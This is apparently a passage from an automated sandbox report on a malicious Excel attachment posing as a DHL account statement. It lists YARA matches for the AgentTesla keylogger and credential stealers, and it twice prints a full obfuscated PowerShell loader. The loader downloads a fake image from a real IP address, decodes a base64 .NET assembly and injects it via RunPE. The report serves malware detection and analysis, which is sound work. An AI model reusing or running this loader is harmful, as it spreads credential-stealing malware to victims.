0000000D.00000002.516749164.00000000021BD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.000000000210B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022DD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.000000000222C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002490000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000228B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.0000000002320000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023EB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002480000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.0000000002350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022BB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.000000000210B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.000000000222C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.517243140.0000000002801000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002490000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000228B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.0000000002320000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023EB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002480000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.0000000002350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022BB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.000000000210B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.000000000222C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AddInProcess32.exe, 0000000A.00000002.485482053.0000000002289000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.0000000002109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: powershell.exe, 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, cPKWk.cs.Net Code: _00D8VK

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.41bb700.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 7791
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 7791Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_010243C86_2_010243C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002438E88_2_002438E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_002449088_2_00244908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0024F3208_2_0024F320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0024BB588_2_0024BB58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0024B3CD8_2_0024B3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00243C308_2_00243C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00471D608_2_00471D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004705C08_2_004705C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004746688_2_00474668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004716788_2_00471678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002C403010_2_002C4030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002C38E810_2_002C38E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002C490010_2_002C4900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002CF31810_2_002CF318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002CBB5010_2_002CBB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002CB3D310_2_002CB3D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00451D6010_2_00451D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004505C010_2_004505C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0045466810_2_00454668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0045167810_2_00451678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_001C38E811_2_001C38E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_001C490011_2_001C4900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_001CF31811_2_001CF318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_001CBB5011_2_001CBB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_001C403011_2_001C4030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00481D6011_2_00481D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004805C011_2_004805C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0048466811_2_00484668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0048167811_2_00481678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_001D38E812_2_001D38E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_001D490012_2_001D4900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_001DF31812_2_001DF318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_001DBB5012_2_001DBB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_001D403012_2_001D4030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_003F1D6012_2_003F1D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_003F05C012_2_003F05C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_003F167812_2_003F1678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_003F466812_2_003F4668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_002538E813_2_002538E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0025490013_2_00254900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0025F31813_2_0025F318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0025BB5013_2_0025BB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0025403013_2_00254030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_00661D6013_2_00661D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_006605C013_2_006605C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0066466813_2_00664668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 13_2_0066167813_2_00661678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036884014_2_00368840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036493814_2_00364938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036392014_2_00363920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036BDB014_2_0036BDB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036F5F814_2_0036F5F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0036406814_2_00364068
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003688F814_2_003688F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_006E086014_2_006E0860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_006E191814_2_006E1918
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.41bb700.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@20/8@7/4
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR75BB.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................K.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.5.6...4L.........................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................@L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................RL.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................^L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................pL.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n........L.........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s....................>.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................L.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................M.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................M.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........X.........................s............................................Jump to behavior
